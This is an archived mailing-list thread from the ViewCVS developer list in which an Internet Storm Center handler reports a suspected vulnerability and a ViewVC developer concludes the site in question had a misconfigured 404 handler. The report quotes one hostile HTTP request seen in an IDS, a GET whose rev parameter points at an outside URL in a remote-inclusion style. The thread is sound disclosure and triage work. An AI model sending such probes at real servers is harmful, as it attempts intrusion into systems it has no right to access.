Re: [viewvc-dev] Possible vulnerability in ViewCVS

toby <[email protected]>
Newsgroups gmane.comp.version-control.cvs.viewcvs.devel
Message-ID <[email protected]>
Michael, thanks for the update. Details would be welcome if you care to
forward them along.

t

On Jan 29, 2008 7:39 PM, C. Michael Pilato <[email protected]> wrote:

> toby wrote:
> > Hello,
> > I'm one of the handlers at the Internet Storm Center. We just got a note
> > from one
> > of our contributors about seeing new strings showing up in their IDS
> > that suggest
> > a possible vulnerability in ViewCVS:
> >
> > GET
> > //viewcvs.cgi/snort/etc/sid-msg.map?rev=
> http://nocsom.org/images/IDsafeon.txt???
> >
> > The contributor has validated that it worked against some live sites
> > online but was unable to tell us which version was vulnerable.
> > Is this an attack you are already aware of? If so, which version is no
> > longer vulnerable? We'd like to warn our readers that this is showing up
> > but wanted to give you a heads-up and a chance to fix it if you weren't
> > already aware.
> >
> > We look forward to your response.
> > Thanks,
> > toby
> > (handler on deck)
>
> I've corresponded privately with Toby about this matter over the past few
> days, and his informant (who wishes to remain anonymous) pointed me
> (through
> Toby) to a particular website he claimed was suffering from a ViewVC
> vulnerability.  I've reviewed the information and have the utmost
> confidence
> that he is mistaken, seeing not a vulnerability in ViewVC but install a
> bizarre 404 handler on the site in question.
>
> I can provide additional details for third-party investigation if anyone
> is
> interested.
>
> --
> C. Michael Pilato <[email protected]>
> CollabNet   <>   www.collab.net   <>   Distributed Development On Demand
>
>
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.